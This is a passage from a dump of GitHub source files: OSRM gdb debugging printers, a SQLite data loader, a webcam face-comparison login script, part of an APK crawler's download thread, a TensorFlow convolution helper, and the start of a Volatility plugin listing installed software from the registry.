pp.add_printer('TurnInstruction', '::TurnInstruction$', TurnInstructionPrinter)\n    pp.add_printer('Coordinate', '::Coordinate$', CoordinatePrinter)\n    pp.add_printer('TurnLaneData', '::TurnLaneData$', TurnLaneDataPrinter)\n    return pp\n\n## unregister OSRM pretty printer before (re)loading\ngdb.pretty_printers = [x for x in gdb.pretty_printers if not isinstance(x, gdb.printing.RegexpCollectionPrettyPrinter) or x.name != 'OSRM']\ngdb.printing.register_pretty_printer(gdb.current_objfile(), build_pretty_printer())\n\nimport geojson\nimport os\nimport time\nimport tempfile\nimport urllib.parse\nimport webbrowser\nimport re\n\nclass GeojsonPrinter (gdb.Command):\n    \"\"\"Display features on geojson.io.\"\"\"\n\n    def __init__ (self):\n        super (GeojsonPrinter, self).__init__ ('geojson', gdb.COMMAND_USER)\n        self.to_geojson = {\n            'osrm::engine::guidance::RouteSteps': self.RouteSteps,\n            'std::vector<osrm::engine::guidance::RouteStep, std::allocator<osrm::engine::guidance::RouteStep> >': self.RouteSteps}\n\n    @staticmethod\n    def encodeURIComponent(s):\n        return urllib.parse.quote(s.encode('utf-8'), safe='~()*!.\\'')\n\n    @staticmethod\n    def RouteSteps(steps):\n        k, road, result = 0, [], []\n        for step in iterate(steps):\n            maneuver, location = step['maneuver'], step['maneuver']['location']\n            ll = lonlat(location)\n            road.append(ll)\n\n            properties = {field.name: str(step[field.name]) for field in step.type.fields() if str(step[field.name]) != '\"\"'}\n            properties.update({'maneuver.' + field.name: str(maneuver[field.name]) for field in maneuver.type.fields()})\n            properties.update({'stroke': '#0000ff', 'stroke-opacity': 0.8, 'stroke-width': 15})\n            result.append(geojson.Feature(geometry=geojson.LineString([ll, ll]), properties=properties))\n\n        road = geojson.Feature(geometry=geojson.LineString(road), properties={'stroke': '#0000ff', 'stroke-opacity': 0.5, 'stroke-width':5})\n        return [road, *result]\n\n    def invoke (self, arg, from_tty):\n        try:\n            val = gdb.parse_and_eval(arg)\n            features = self.to_geojson[str(val.type)](val)\n            request = self.encodeURIComponent(str(geojson.FeatureCollection(features)))\n            webbrowser.open('http://geojson.io/#data=data:application/json,' + request)\n        except KeyError as e:\n            print ('no GeoJSON printer for: ' + str(e))\n        except gdb.error as e:\n            print('error: %s' % (e.args[0] if len(e.args)>0 else 'unspecified'))\n        return\n\nGeojsonPrinter()\n\n\n\nclass SVGPrinter (gdb.Command):\n    \"\"\"\n    Generate SVG representation within HTML of edge-based graph in facade.\n    SVG image contains:\n      - thick lines with arrow heads are edge-based graph nodes with forward (green) and reverse (red) node IDs (large font)\n      - segment weights are numbers (small font) in the middle of segments in forward (green) or reverse (red) direction\n      - thin lines are edge-based graph edges in forward (green), backward (red) or both (yellow) directions with\n        weights, edge-based graph node IDs (source, target) and some algorithm-specific information\n      - coordinates of segments end points (node-based graph nodes)\n    \"\"\"\n\n    def __init__ (self):\n        super (SVGPrinter, self).__init__ ('svg', gdb.COMMAND_USER)\n        self.re_bbox = None\n        # one facade entry per routing algorithm (CH and MLD)\n        self.to_svg = {\n            'const osrm::engine::datafacade::ContiguousInternalMemoryDataFacade<osrm::engine::routing_algorithms::ch::Algorithm> &': self.Facade,\n            'const osrm::engine::datafacade::ContiguousInternalMemoryDataFacade<osrm::engine::routing_algorithms::mld::Algorithm> &': self.Facade,\n            'osrm::engine::routing_algorithms::Facade': self.Facade,\n            'osrm::engine::DataFacade': self.Facade}\n\n\n    @staticmethod\n    def show_svg(svg, width, height):\n        svg = \"\"\"\n\n\n \n\n\n \n \n \n \n\n \n \n \n\n \n \n \n \n\"\"\" + svg + '\\n'\n        fd, name = tempfile.mkstemp('.html')\n        os.write(fd, 
svg.encode('utf-8'))\n os.close(fd)\n print ('Saved to ' + name)\n webbrowser.open('file://' + name)\n\n @staticmethod\n def getByGeometryId(facade, id, value):\n return call(facade, 'GetUncompressed' + ('Forward' if id['forward'] else 'Reverse') + value, id['id'])\n\n @staticmethod\n def getNodesInBoundingBox(facade, bbox):\n nodes, longitudes, latitudes = set(), set(), set()\n for node in range(call(facade, 'GetNumberOfNodes')):\n geometry = SVGPrinter.getByGeometryId(facade, call(facade, 'GetGeometryIndex', node), 'Geometry')\n node_longitudes, node_latitudes, in_bbox = set(), set(), False\n for nbg_node in iterate(geometry):\n lon, lat = lonlat(call(facade, 'GetCoordinateOfNode', nbg_node))\n node_longitudes.add(lon)\n node_latitudes.add(lat)\n in_bbox = in_bbox or bbox[0] <= lon and lon <= bbox[2] and bbox[1] <= lat and lat <= bbox[3]\n if in_bbox:\n nodes.add(node)\n longitudes.update(node_longitudes)\n latitudes.update(node_latitudes)\n return nodes, longitudes, latitudes\n\n @staticmethod\n def Facade(facade, width, height, arg):\n\n result = ''\n\n ## parse additional facade arguments\n re_float = '[-+]?[0-9]*\\.?[0-9]+'\n bbox = re.search('(' + re_float + '),(' + re_float + ');(' + re_float + '),(' + re_float +')', arg)\n bbox = [float(x) for x in bbox.groups()] if bbox else [-180, -90, 180, 90]\n mld_level = re.search('L:([0-9]+)', arg)\n mld_level = int(mld_level.group(1)) if mld_level else 0\n\n marginx, marginy = 75, 75\n INVALID_SEGMENT_WEIGHT, MAX_SEGMENT_WEIGHT = gdb.parse_and_eval('INVALID_SEGMENT_WEIGHT'), gdb.parse_and_eval('INVALID_SEGMENT_WEIGHT')\n segment_weight = lambda x: str(x) + (' invalid' if x == INVALID_SEGMENT_WEIGHT else ' max' if x == MAX_SEGMENT_WEIGHT else '')\n\n if mld_level > 0:\n mld_facade = facade.cast(gdb.lookup_type('osrm::engine::datafacade::ContiguousInternalMemoryAlgorithmDataFacade'))\n mld_partition = mld_facade['mld_partition']\n mld_levels = call(mld_partition, 'GetNumberOfLevels')\n if mld_level < mld_levels:\n sentinel_node = call(mld_partition['partition'], 'size') - 1 # GetSentinelNode\n number_of_cells = call(mld_partition, 'GetCell', mld_level, sentinel_node) # GetNumberOfCells\n result += \"\"\n for cell in range(number_of_cells):\n result += \"\"\"\n\"\"\" \\\n .format(cell, int(256 * cell / number_of_cells))\n result += \"\\n\"\n else:\n mld_level = 0\n else:\n mld_levels = 0\n\n ## get nodes\n nodes, longitudes, latitudes = SVGPrinter.getNodesInBoundingBox(facade, bbox)\n if len(nodes) == 0:\n return ''\n\n ## create transformations (lon,lat) -> (x,y)\n minx, miny, maxx, maxy = min(longitudes), min(latitudes), max(longitudes), max(latitudes)\n if abs(maxx - minx) < 1e-8:\n maxx += (maxy - miny) / 2\n minx -= (maxy - miny) / 2\n if abs(maxy - miny) < 1e-8:\n maxy += (maxx - minx) / 2\n miny -= (maxx - minx) / 2\n tx = lambda x: marginx + (x - minx) * (width - 2 * marginx) / (maxx - minx)\n ty = lambda y: marginy + (maxy - y) * (height - 2 * marginy) / (maxy - miny)\n t = lambda x: str(tx(x[0])) + ',' + str(ty(x[1]))\n\n print ('Graph has {} nodes and {} edges and {} nodes in the input bounding box {},{};{},{} -> {},{};{},{}'\n .format(call(facade, 'GetNumberOfNodes'), call(facade, 'GetNumberOfEdges'), len(nodes), *bbox, minx, miny, maxx, maxy))\n\n for node in nodes:\n geometry_id = call(facade, 'GetGeometryIndex', node)\n direction = 'forward' if geometry_id['forward'] else 'reverse'\n print (geometry_id, direction)\n geometry = SVGPrinter.getByGeometryId(facade, geometry_id, 'Geometry')\n weights = 
SVGPrinter.getByGeometryId(facade, geometry_id, 'Weights')\n\n\n\n ## add the edge-based node\n ref = 'n' + str(node)\n cell_background = ' filter=\"url(#cellid-{})\"'.format(call(mld_partition, 'GetCell', mld_level, node)) if mld_level > 0 else ''\n result += ''\n result += '' + str(node) + '\\n'\n\n ## add segments with weights\n geometry_first = geometry['_M_impl']['_M_start']\n for segment, weight in enumerate(iterate(weights)):\n ref = 's' + str(node) + '.' + str(segment)\n fr = lonlat(call(facade, 'GetCoordinateOfNode', geometry_first.dereference()))\n to = lonlat(call(facade, 'GetCoordinateOfNode', (geometry_first+1).dereference()))\n if fr == to:\n ## node penalty on zero length segment (traffic light)\n result += '' \\\n + '🚦 ' + segment_weight(weight) + '\\n'\n else:\n ## normal segment\n result += ''\\\n + ''\\\n + '' \\\n + segment_weight(weight) + '\\n'\n geometry_first += 1\n\n ## add edge-based edges\n s0, s1 = geometry['_M_impl']['_M_start'].dereference(), (geometry['_M_impl']['_M_start'] + 1).dereference()\n for edge in []: # range(call(facade, 'BeginEdges', node), call(facade, 'EndEdges', node)): adjust to GetAdjacentEdgeRange\n target, edge_data = call(facade, 'GetTarget', edge), call(facade, 'GetEdgeData', edge)\n direction = 'both' if edge_data['forward'] and edge_data['backward'] else 'forward' if edge_data['forward'] else 'backward'\n target_geometry = SVGPrinter.getByGeometryId(facade, call(facade, 'GetGeometryIndex', target), 'Geometry')\n t0, t1 = target_geometry['_M_impl']['_M_start'].dereference(), (target_geometry['_M_impl']['_M_start'] + 1).dereference()\n\n ## the source point: the first node of the source node's first segment\n s0x, s0y = lonlat(call(facade, 'GetCoordinateOfNode', s0))\n\n ## the first control point: the node orthogonal to the first segment at the middle of the segment and offset distance length / 4\n s1x, s1y = lonlat(call(facade, 'GetCoordinateOfNode', s1))\n d0x, d0y = s1x - s0x, s1y - s0y\n c0x, c0y = s0x + d0x /2 - d0y /4, s0y + d0y / 2 + d0x /4\n\n ## the end point: middle of the first segment of the target node\n t0x, t0y = lonlat(call(facade, 'GetCoordinateOfNode', t0))\n t1x, t1y = lonlat(call(facade, 'GetCoordinateOfNode', t1))\n d1x, d1y = t1x - t0x, t1y - t0y\n e1x, e1y = t0x + d1x / 2, t0y + d1y / 2\n\n ## the second control point: the first node of the target's node first segment\n c1x, c1y = t0x, t0y\n\n ref = 'e' + str(edge)\n edge_arrow = ('↔' if edge_data['backward'] else '→') if edge_data['forward'] else ('←' if edge_data['backward'] else '?')\n text = str(node) + edge_arrow + str(target) + ' ' + str(edge_data['weight']) \\\n + (', shortcut' if 'shortcut' in set([x.name for x in edge_data.type.target().fields()]) and edge_data['shortcut'] else '')\n result += ''\\\n + ''\\\n + '' \\\n + text + '\\n'\n result += '\\n\\n'\n\n ## add longitudes and latitudes\n for lon in longitudes:\n result += '' + str(lon) + '\\n'\n for lat in latitudes:\n result += '' + str(lat) + '\\n'\n return result\n\n def invoke (self, arg, from_tty):\n try:\n argv = arg.split(' ')\n if len(argv) == 0 or len(argv[0]) == 0:\n print ('no argument specified\\nsvg [BOUNDING BOX west,south;east,north] [SIZE width,height] [L:MLD level]')\n return\n val = gdb.parse_and_eval(argv[0])\n dims = re.search('([0-9]+)x([0-9]+)', arg)\n width, height = [int(x) for x in dims.groups()] if dims else (2100, 1600)\n type = val.type.target().unqualified() if val.type.code == gdb.TYPE_CODE_REF else val.type\n svg = self.to_svg[str(type)](val, width, height, arg)\n 
self.show_svg(svg, width, height)\n        except KeyError as e:\n            print ('no SVG printer for: ' + str(e))\n        except gdb.error as e:\n            print('error: %s' % (e.args[0] if len(e.args)>0 else 'unspecified'))\n\nSVGPrinter()\n","repo_name":"Project-OSRM/osrm-backend","sub_path":"scripts/gdb_printers.py","file_name":"gdb_printers.py","file_ext":"py","file_size_in_byte":19296,"program_lang":"python","lang":"en","doc_type":"code","stars":5806,"dataset":"github-code","pt":"37"} +{"seq_id":"22280173367","text":"import os\nimport logging\nimport functools\nfrom pathlib import Path\n\nfrom typing import Dict, List\nfrom sqlalchemy import create_engine, inspect, Table\nfrom sqlalchemy.event import listen\nfrom sqlalchemy.schema import CreateSchema\nfrom sqlalchemy import exc\n\nfrom target_sqlite.utils.error import SchemaUpdateError\n\n\n# Map sqlalchemy types to SQLite Types\n# Required for two reasons:\n#  1. Compare the sqlalchemy Table definition to what is defined in SQLite\n#  2. Use the type to manually execute an ALTER TABLE for updating or\n#     adding new columns\nMAP_SQLALCHEMY_TO_SQLITE_TYPE = {\n    \"BIGINT\": \"INTEGER\",\n    \"FLOAT\": \"REAL\",\n    \"VARCHAR\": \"TEXT\",\n    \"BOOLEAN\": \"INTEGER\",\n    \"TIMESTAMP\": \"TEXT\",\n}\n\n
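# For example, a sqlalchemy BIGINT column stringifies to \"BIGINT\", which this map\n# sends to SQLite's INTEGER affinity: MAP_SQLALCHEMY_TO_SQLITE_TYPE[\"BIGINT\"] -> \"INTEGER\".\n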
\nclass SQLiteLoader:\n    def __init__(self, table: Table, config: Dict) -> None:\n        self.table = table\n        self.database_path = Path(config[\"database\"]).with_suffix(\".db\")\n\n        self.engine = create_engine(f\"sqlite:///{self.database_path}\")\n        listen(self.engine, \"first_connect\", self.enable_wal)\n\n    def enable_wal(cls, conn, conn_record):\n        cursor = conn.cursor()\n        cursor.execute(\"PRAGMA journal_mode=WAL\")\n        cursor.close()\n\n    def attribute_names(self) -> List[str]:\n        \"\"\"\n        Get the attribute(column) names for the associated Table\n        \"\"\"\n        return [column.name for column in self.table.columns]\n\n    def empty_record(self) -> Dict:\n        \"\"\"\n        Get a dictionary representing an empty (all attributes None) record for\n        the table associated with this SQLiteLoader instance.\n\n        Used as a template in order to normalize (map) all imported records to\n        the full schema they are defined for.\n\n        Important for records with multiple optional attributes that are not\n        always there, like for example Multi Level JSON objects that are\n        flattened before uploaded to SQLite.\n\n        Guards against sqlalchemy errors for missing required values for\n        bind parameters.\n        \"\"\"\n        return dict.fromkeys(column.name for column in self.table.columns)\n\n    def schema_apply(self) -> None:\n        \"\"\"\n        Apply the schema defined for self.table to the Database we connect to\n        \"\"\"\n        inspector = inspect(self.engine)\n\n        all_table_names = inspector.get_table_names(self.table.schema)\n        if not (self.table.name in all_table_names):\n            logging.debug(f\"Table {self.table.name} does not exist -> creating it \")\n            self.table.create(self.engine)\n        else:\n            # There is an existing Table: Check if a schema update is required\n            self.schema_update(inspector)\n\n    def schema_update(self, inspector) -> None:\n        \"\"\"\n        Check if there is a schema diff between the new Table and the existing\n        one and if the changes can be supported, update the table with the diff.\n\n        Rules:\n        1. Only support type upgrades (e.g. STRING -> VARCHAR) for existing columns\n        2. If a not supported type update is requested (e.g. float --> int)\n           raise a SchemaUpdateError exception.\n        3. Never drop columns, only update or add new ones\n        \"\"\"\n        existing_columns = {}\n        columns_to_add = []\n\n        # Fetch the existing defined tables and store them in a format useful\n        # for comparisons.\n        all_columns = inspector.get_columns(self.table.name)\n\n        for column in all_columns:\n            existing_columns[column[\"name\"]] = f\"{column['type']}\"\n\n        # Check the new Table definition for new attributes or attributes\n        # with an updated data type\n        for column in self.table.columns:\n            # SQLITE does not support updating existing columns so only add new ones\n            if column.name not in existing_columns:\n                # A new column to be added to the table\n                column_type = MAP_SQLALCHEMY_TO_SQLITE_TYPE[f\"{column.type}\"]\n                columns_to_add.append((column.name, column_type))\n\n        # If there are any columns to add, make the schema update\n        for (name, type) in columns_to_add:\n            self.add_column(name, type)\n\n    def add_column(self, col_name: str, col_data_type: str) -> None:\n        \"\"\"\n        Add the requested column to the SQLite Table defined by self.table\n        \"\"\"\n        full_name = self.table.name\n        alter_stmt = f\"ALTER TABLE {full_name} ADD COLUMN {col_name} {col_data_type}\"\n\n        logging.debug(f\"Adding COLUMN {col_name} ({col_data_type}) to {full_name}\")\n\n        with self.engine.connect() as connection:\n            connection.execute(alter_stmt)\n\n    def load(self, data: List[Dict]) -> None:\n        \"\"\"\n        Load the data provided as a list of dictionaries to the given Table\n        \"\"\"\n        if not data:\n            return\n\n        logging.debug(f\"Loading data to SQLite for {self.table.name}\")\n        if self.table.primary_key:\n            # We have to use SQLite's Upsert but the default SQLite for python\n            # does not yet support the \"ON CONFLICT\" clause for upserting\n            # So, we'll follow the slow but stable approach of inserting each\n            # row and updating on conflict.\n            with self.engine.connect() as connection:\n                for row in data:\n                    try:\n                        connection.execute(self.table.insert(), row)\n                    except exc.IntegrityError:\n                        statement = self.table.update()  # .where()\n                        for primary_key in self.table.primary_key:\n                            statement = statement.where(\n                                primary_key == row[primary_key.name]\n                            )\n\n                        connection.execute(statement, row)\n        else:\n            # Just Insert (append) as no conflicts can arise\n            with self.engine.connect() as connection:\n                connection.execute(self.table.insert(), data)\n
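\n    # Sketch of an alternative (not what load() above does): on SQLite >= 3.24 the\n    # same per-row try/except upsert could be a single native statement, e.g.\n    #   INSERT INTO t (id, col) VALUES (?, ?)\n    #   ON CONFLICT(id) DO UPDATE SET col = excluded.col\n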
","repo_name":"MeltanoLabs/target-sqlite","sub_path":"target_sqlite/sqlite_loader.py","file_name":"sqlite_loader.py","file_ext":"py","file_size_in_byte":5932,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"7175656586","text":"def makeFace(facename, msg, endstr):\r\n    print(msg)  # show the prompt message\r\n    cv2.namedWindow(\"frame\")\r\n    cv2.waitKey(0)\r\n    cap = cv2.VideoCapture(0)  # open the camera\r\n    while(cap.isOpened()):  # while the camera is open\r\n        ret, img = cap.read()  # read a frame\r\n        if ret == True:  # read succeeded\r\n            cv2.imshow(\"frame\", img)  # show the frame\r\n            k = cv2.waitKey(100)  # poll the keyboard every 0.1 seconds\r\n            if k == ord(\"z\") or k == ord(\"Z\"):  # user pressed the \"z\" key\r\n                cv2.imwrite(facename,img)  # save the shot\r\n                image = cv2.imread(facename)  # reload the file for face detection\r\n                faces = faceCascade.detectMultiScale(image, scaleFactor=1.1, minNeighbors=5, minSize=(30,30), flags = cv2.CASCADE_SCALE_IMAGE)\r\n                (x, y, w, h) = (faces[0][0], faces[0][1], faces[0][2], faces[0][3])  # keep only the first detected face\r\n                image1 = Image.open(facename).crop((x, y, x+w, y+h))  # crop the face\r\n                image1 = image1.resize((200, 200), Image.ANTIALIAS)  # resize to 200x200\r\n                image1.save(facename)  # save\r\n                break;\r\n    cap.release()  # close the camera\r\n    cv2.destroyAllWindows()\r\n    print(endstr)\r\n    return\r\n\r\nimport cv2, os, math, operator\r\nfrom PIL import Image\r\nfrom functools import reduce\r\n\r\ncasc_path = \"media\\\\etc\\\\haarcascades\\\\haarcascade_frontalface_default.xml\"\r\nfaceCascade = cv2.CascadeClassifier(casc_path)  # build the face classifier\r\nrecogname = \"media\\\\recogface.jpg\"  # registered user's face file\r\nloginname = \"media\\\\loginface.jpg\"  # login attempt face file\r\nos.system(\"cls\")  # clear the screen\r\nif(os.path.exists(recogname)):  # the registered face file already exists\r\n    msg = \"Press any key to capture the login face.\\nOnce the camera opens, press 'z' to take the comparison photo!\"\r\n    makeFace(loginname, msg, \"\")  # capture the login face\r\n    pic1 = Image.open(recogname)  # open the registered face\r\n    pic2 = Image.open(loginname)  # open the login face\r\n    h1 = pic1.histogram()  # measure image difference via histograms\r\n    h2 = pic2.histogram()\r\n    diff = math.sqrt(reduce(operator.add, list(map(lambda a,b: (a-b)**2, h1, h2)))/len(h1))\r\n    if(diff <= 100):  # a difference within 100 counts as a match\r\n        print(\"Verified, welcome to the system! diff=%4.2f\" % diff)\r\n    else:\r\n        print(\"Face does not match, access denied! diff=%4.2f\" % diff)\r\nelse:  # no registered face file yet\r\n    msg = \"Press any key to capture the user face.\\nOnce the camera opens, press 'z' to take the photo!\\n\"\r\n    endstr = \"User face captured!\"\r\n    makeFace(recogname, msg, endstr)  # capture the registered face\r\n","repo_name":"taiwc/Python","sub_path":"faceLock1.py","file_name":"faceLock1.py","file_ext":"py","file_size_in_byte":2630,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21615713870","text":"#!/usr/bin/python\n\nimport threading\nimport pycurl\nimport hashlib\nfrom Queue import Queue\nfrom Queue import Empty\nimport time\nimport os\nimport socket\nfrom logger import Logger\nfrom rpcmonitor import RpcMonitor\nimport ndutil\n\nclass DownloadThread(threading.Thread):\n\tdef __init__(self, args, name):\n\t\tsuper(DownloadThread, self).__init__()\n\t\tself.ddQueue = args[0]\n\t\tself.dpQueue = args[1]\n\t\tself.ddLock = args[2]\n\t\tself.pdLock = args[3]\n\t\tself.pdQueue = args[4]\n\t\tself.logger = args[5]\n\t\tself.rpcMonitor = args[6]\n\t\tself.name = name\n\n\tdef 
run(self):\n\t\tnumThreads = self.dlThreadNum\n\n\t\tddLock = threading.Lock()\n\t\tdownloadThreads = []\n\t\tddQueues = []\n\n\t\tself.rpcMonitor.setDownloadingTotal(0)\n\t\tfor i in range(numThreads):\n\t\t\tddQueue = Queue()\n\t\t\tthread = DownloadThread([ddQueue, self.dpQueue, ddLock, self.pdLock, self.pdQueue, self.logger, self.rpcMonitor], 'DownloadThread%s' % i)\n\t\t\tddQueues.append(ddQueue)\n\t\t\tdownloadThreads.append(thread)\n\n\t\tfor i in range(numThreads):\n\t\t\tdownloadThreads[i].start()\n\n\t\twhile True:\n\t\t\ttry:\n\t\t\t\tdata = self.pdQueue.get(True, 10)\n\t\t\t\t#generate name\n\t\t\t\tfileName = '%s/%s.apk' % (self.dirWorking, ndutil.getMd5ByStr(data))\n\n\t\t\t\t#select thread\n\t\t\t\tminQueueIdx = 0\n\t\t\t\tminQueueSize = ddQueues[0].qsize()\n\t\t\t\tfor i in range(1, numThreads):\n\t\t\t\t\tif ddQueues[i].qsize() < minQueueSize:\n\t\t\t\t\t\tminQueueIdx = i\n\t\t\t\t\t\tminQueueSize = ddQueues[i].qsize()\n\n\t\t\t\tddQueues[minQueueIdx].put([data, fileName], 1)\n\n\t\t\texcept Empty:\n\t\t\t\tfreeThreadNum = 0\n\t\t\t\tfor i in range(0, numThreads):\n\t\t\t\t\tif ddQueues[i].empty() == True:\n\t\t\t\t\t\tfreeThreadNum = freeThreadNum + 1\n\n\t\t\t\tif ( float(freeThreadNum) / float(numThreads) ) >= float(0.5):\n\t\t\t\t\tself.udpSocket.sendto('empty', self.addr)\n\n\t\tfor i in range(numThreads):\n\t\t\tdownloadThreads[i].join()\n","repo_name":"jovistar/nDroid-Crawler","sub_path":"downloader.py","file_name":"downloader.py","file_ext":"py","file_size_in_byte":3274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21640577443","text":"from pathlib import Path\nimport re\nimport os\nimport urllib.request as u\n\n\"\"\"\nValidates links from Markdown file\n:return: If file exists or link is available returns True, else - False\n:rtype: boolean\n\"\"\"\n \nINLINE_LINK_RE = re.compile(r'\\[([^\\]]+)\\]\\(([^)]+)\\)')\nroot_path = r\"D:\\Courses\\BILab_2\"\n\ndef find_md_links(md: str):\n \"\"\" Return dict of links in markdown \"\"\"\n links = dict(INLINE_LINK_RE.findall(md))\n return links\n\ndef internet_on(url: str):\n \"\"\" Check that internet resource is available\"\"\"\n try:\n u.urlopen(url, timeout=1)\n return True\n except u.URLError as err: \n return False\n\nwith open(r\"D:\\Courses\\BILab_2\\README.md\", \"r\", encoding=\"UTF-8\") as f:\n lines = \"\".join(f.readlines())\n md_links_dict = find_md_links(lines)\n for link in md_links_dict.values():\n # Validate that local file exists\n if not str(link).startswith(\"http\"):\n link = str.replace(link, \"%20\", \" \")\n link_path = Path(os.path.join(root_path, link))\n if not link_path.is_file():\n print(f\"IS NOT FOUND: {link_path}\")\n else:\n if not internet_on(link):\n print(f\"IS NOT FOUND: {link}\")\n","repo_name":"sergeiboikov/Labs.Python","sub_path":"RegEx/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17452347069","text":"from __future__ import absolute_import, division, print_function\n\nimport tensorflow as tf\nfrom tensorflow import convert_to_tensor as to_T\n\nfrom util.cnn import conv_layer as conv\n\ndef empty_safe_1x1_conv(name, bottom, output_dim, reuse=None):\n # TensorFlow Fold can generate zero-size batch for conv layer\n # which will crash cuDNN on backward pass. 
So use this\n # for 1x1 convolution in modules to avoid the crash.\n bottom_shape = tf.shape(bottom)\n N = bottom_shape[0]\n H = bottom_shape[1]\n W = bottom_shape[2]\n input_dim = bottom.get_shape().as_list()[-1]\n bottom_flat = tf.reshape(bottom, [-1, input_dim])\n\n # weights and biases variables\n with tf.variable_scope(name, reuse=reuse):\n # initialize the variables\n weights_initializer = tf.contrib.layers.xavier_initializer()\n biases_initializer = tf.constant_initializer(0.)\n weights = tf.get_variable('weights', [input_dim, output_dim],\n initializer=weights_initializer)\n biases = tf.get_variable('biases', output_dim,\n initializer=biases_initializer)\n\n conv_flat = tf.nn.xw_plus_b(bottom_flat, weights, biases)\n conv = tf.reshape(conv_flat, to_T([N, H, W, output_dim]))\n\n return conv\n\n# TensorFlow Fold can generate zero-size batch for conv layer\n# which will crash cuDNN on backward pass. So use this\n# for arbitrary convolution in modules to avoid the crash.\ndef empty_safe_conv(name, bottom, kernel_size, stride, output_dim, padding='SAME',\n bias_term=True, weights_initializer=None,\n biases_initializer=None, reuse=None):\n g = tf.get_default_graph()\n with g.gradient_override_map({'Conv2D': 'Conv2D_handle_empty_batch'}):\n return conv(name, bottom, kernel_size, stride, output_dim,\n padding, bias_term, weights_initializer,\n biases_initializer, reuse=reuse)\n\n@tf.RegisterGradient('Conv2D_handle_empty_batch')\ndef _Conv2DGrad(op, grad):\n with tf.device('/cpu:0'):\n return [tf.nn.conv2d_backprop_input(\n tf.shape(op.inputs[0]), op.inputs[1], grad, op.get_attr('strides'),\n op.get_attr('padding'), op.get_attr('use_cudnn_on_gpu'),\n op.get_attr('data_format')),\n tf.nn.conv2d_backprop_filter(op.inputs[0],\n tf.shape(op.inputs[1]), grad,\n op.get_attr('strides'),\n op.get_attr('padding'),\n op.get_attr('use_cudnn_on_gpu'),\n op.get_attr('data_format'))]\n# @tf.RegisterGradient('Conv2D_handle_empty_batch')\n# def _Conv2DGrad(op, grad):\n# def _input_nonempty():\n# return tf.nn.conv2d_backprop_input(\n# tf.shape(op.inputs[0]), op.inputs[1], grad, op.get_attr('strides'),\n# op.get_attr('padding'), op.get_attr('use_cudnn_on_gpu'),\n# op.get_attr('data_format'))\n# def _filter_nonempty():\n# return tf.nn.conv2d_backprop_filter(op.inputs[0],\n# tf.shape(op.inputs[1]), grad,\n# op.get_attr('strides'),\n# op.get_attr('padding'),\n# op.get_attr('use_cudnn_on_gpu'),\n# op.get_attr('data_format'))\n# def _input_empty():\n# return tf.zeros_like(op.inputs[0])\n# def _filter_empty():\n# return tf.zeros_like(op.inputs[1])\n# is_nonempty = tf.greater(tf.size(op.inputs[0]), 0)\n# return [tf.cond(is_nonempty, _input_nonempty, _input_empty),\n# tf.cond(is_nonempty, _filter_nonempty, _filter_empty)]\n","repo_name":"ronghanghu/n2nmn","sub_path":"util/empty_safe_conv.py","file_name":"empty_safe_conv.py","file_ext":"py","file_size_in_byte":3817,"program_lang":"python","lang":"en","doc_type":"code","stars":271,"dataset":"github-code","pt":"37"} +{"seq_id":"34688704824","text":"import volatility.plugins.registry.registryapi as registryapi\nimport volatility.win32.hive as hivemod\nimport volatility.win32.rawreg as rawreg\nimport volatility.debug as debug\nimport volatility.utils as utils\nimport volatility.plugins.registry.hivelist as hivelist\n\ndef vol(k):\n return bool(k.obj_offset & 0x80000000)\n\nclass UninstallInfo(hivelist.HiveList):\n \"\"\"Extract installed software info from Uninstall registry key\"\"\"\n\n meta_info = {}\n meta_info['author'] = 'Dave Lassalle'\n meta_info['copyright'] = 
'Copyright (c) 2014 Dave Lassalle'\r\n    meta_info['contact'] = 'dave@superponible.com'\r\n    meta_info['license'] = 'GNU General Public License 2.0 or later'\r\n    meta_info['url'] = 'http://superponible.com/'\r\n    meta_info['os'] = 'WIN_32_XP_SP3'\r\n    meta_info['version'] = '1.0'\r\n\r\n    def __init__(self, config, *args, **kwargs):\r\n        hivelist.HiveList.__init__(self, config, *args, **kwargs)\r\n        config.add_option('HIVE-OFFSET', short_option = 'o',\r\n                          help = 'SOFTWARE Hive offset (virtual)', type = 'int')\r\n\r\n    def hive_name(self, hive):\r\n        try:\r\n            return hive.FileFullPath.v() or hive.FileUserName.v() or hive.HiveRootPath.v() or \"[no name]\"\r\n        except AttributeError:\r\n            return \"[no name]\"\r\n\r\n    def calculate(self):\r\n        addr_space = utils.load_as(self._config)\r\n        regapi = registryapi.RegistryApi(self._config)\r\n\r\n        software_hive = \"SOFTWARE\"\r\n        uninstall = \"Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\"\r\n\r\n        hive_offsets = []\r\n        if not self._config.HIVE_OFFSET:\r\n            for h in hivelist.HiveList.calculate(self):\r\n                hive_name = self.hive_name(h)\r\n                if software_hive in hive_name:\r\n                    # collect every SOFTWARE hive instead of keeping only the last one found\r\n                    hive_offsets.append((hive_name, h.obj_offset))\r\n        else:\r\n            hive_offsets = [(\"User Specified\", self._config.HIVE_OFFSET)]\r\n\r\n        for name, hoff in set(hive_offsets):\r\n            h = hivemod.HiveAddressSpace(addr_space, self._config, hoff)\r\n            root = rawreg.get_root(h)\r\n            if not root:\r\n                if self._config.HIVE_OFFSET:\r\n                    debug.error(\"Unable to find root key. Is the hive offset correct?\")\r\n            else:\r\n                uninstall_key = rawreg.open_key(root, uninstall.split('\\\\'))\r\n                if uninstall_key:\r\n                    yield name, uninstall_key\r\n                else:\r\n                    # calculate() has no outfd; report through the debug facility instead\r\n                    debug.info(\"The requested key could not be found in the hive(s) searched\")\r\n\r\n\r\n    def voltext(self, key):\r\n        return \"(V)\" if vol(key) else \"(S)\"\r\n\r\n    def render_text(self, outfd, data):\r\n        print_values = {5:'InstallSource', 6:'InstallLocation', 3:'Publisher',\r\n                        1:'DisplayName', 2:'DisplayVersion', 4:'InstallDate'}\r\n        outfd.write(\"Legend: (S) = Stable (V) = Volatile\\n\\n\")\r\n        keyfound = False\r\n        for reg, key in data:\r\n            if key:\r\n                keyfound = True\r\n                outfd.write(\"----------------------------\\n\")\r\n                outfd.write(\"Registry: {0}\\n\".format(reg))\r\n                outfd.write(\"Key name: {0} {1:3s}\\n\".format(key.Name, self.voltext(key)))\r\n                